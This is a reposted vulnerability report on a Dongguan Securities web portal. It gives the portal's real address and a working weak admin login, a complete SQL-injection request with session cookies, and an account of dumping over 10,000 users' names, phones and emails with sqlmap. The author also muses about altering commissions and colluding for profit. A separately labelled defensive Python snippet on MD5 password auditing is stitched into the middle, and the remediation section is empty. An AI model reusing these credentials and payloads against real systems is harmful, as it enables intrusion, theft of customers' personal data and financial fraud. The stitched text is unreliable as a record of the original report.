神刀安全网

Dongguan Securities: weak password on a site leads to SQL injection and leakage of user information (name/phone/email, etc.)

Brief description:

RT (see title).

Details:

http://113.78.134.110:81/login.do has weak credentials: admin:000000


Found some interesting functions, for example the ability to control commissions.


If I had simply modified the commission formula and then colluded with one or two people... (very lucrative).

Proof of vulnerability:

Code:
POST /plug-in/FormulaEdit/xcfa/XCFA_operater.jsp?MODE=getRYJB HTTP/1.1
Host: 113.78.134.110:81
Content-Length: 7
Accept: */*
Origin: http://113.78.134.110:81
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://113.78.134.110:81/plug-in/common/transfer.jsp?ObjName=JspXCFA_ALL&Title=%E8%96%AA%E9%85%AC%E6%96%B9%E6%A1%88%E6%9F%A5%E7%9C%8B&Target=%2FUIProcessor%3FTable%3DJspXCFA_ALL%26ObjDescribe%3DekQgsYuZOYlCJlO7vghYvv41*q*BGee3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,es;q=0.6,fr;q=0.4,vi;q=0.2
Cookie: JSESSIONID=CD1D8642528FC7F86453EDE89D86BA6D.server1; UserID=admin; PortalToken=CD1D8642528FC7F86453EDE89D86BA6D.server1; ys-TreeState_5c1e7d68efba511c6e0ea9b8cafa4fb3.gt=o%3ARoot%3Ds%253AE%5EType.0%3Ds%253AE%5EType.1%3Ds%253AE; ys-TreeState_93782624d81163345d84577e158e26bd.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_799cde630a734708b3880f841ffa3f7d=o%3A1%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_e0b9adc1f800d29087017abd5def90cb.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_ed9b71d747488ab403c5cbf458822293.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_190cd205bb5a88c520b1fb91a3415f3a.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_7ef60d9127bb21b3203ca468ff919460.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_aa1c2e4bf18892844e938f68b2de3da1.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_293313064b95482991c003a03ac389b8.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE

RYFL=24

Threw it straight into sqlmap and found that the database user also has DBA privileges.


The user count is not large, just over 10,000 (1W+).


But it involves users' basic information such as name, phone number and email; I extracted the most recent portion.


And, to my surprise, a large number of weak passwords turned up...
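The weak passwords were visible because the extracted rows store unsalted MD5 digests, which sqlmap annotated as 111111 and 888888. The following is an added example, not part of the original report: a defender-side audit that flags accounts whose stored unsalted MD5 matches a short constructed list of trivially guessable passwords, next to a salted PBKDF2 storage format that removes the shared-digest property. The two known digests are the ones from the report's rows; the account labels, the fourth digest's meaning and the candidate list are constructed.

```python
import hashlib
import hmac
import os
from typing import Dict, List, Optional

# Constructed sample of a user table's password column in the report's
# format: unsalted hex MD5. The first two digests are the ones the report's
# extracted rows contained (MD5 of "111111" and "888888").
SAMPLE_HASHES: Dict[str, str] = {
    "user_a": "96e79218965eb72c92a549dd5a330112",
    "user_b": "96e79218965eb72c92a549dd5a330112",
    "user_c": "21218cca77804d2ba1922c33e0151105",
    "user_d": "b82ef710e72ee35fc33bd9a454668b01",
}
# Constructed, hypothetical short list of trivially guessable passwords.
WEAK_PASSWORDS: List[str] = ["111111", "123456", "888888", "000000", "admin"]

def unsalted_md5(password: str) -> str:
    return hashlib.md5(password.encode("utf-8")).hexdigest()

def audit_weak_md5(hashes: Dict[str, str], candidates: List[str]) -> Dict[str, str]:
    """Map each account whose stored digest equals MD5(candidate) to that
    candidate. With no salt, every account sharing a password shares a
    digest, so one MD5 per candidate covers the whole table."""
    table = {unsalted_md5(p): p for p in candidates}
    return {acct: table[h] for acct, h in hashes.items() if h in table}

def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = 600_000) -> str:
    """Replacement format: per-user random salt + PBKDF2-HMAC-SHA256,
    stored as 'pbkdf2_sha256$iterations$salthex$digesthex'."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"

def verify_password(password: str, stored: str) -> bool:
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)

if __name__ == "__main__":
    for acct, pw in audit_weak_md5(SAMPLE_HASHES, WEAK_PASSWORDS).items():
        print(f"{acct}: stored hash is unsalted MD5 of weak password {pw!r}")
    # Same password for two users no longer yields the same stored value.
    print(hash_password("111111") != hash_password("111111"))
```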

Remediation:

Copyright notice: 神刀安全网 reposted this from 路人甲@乌云.
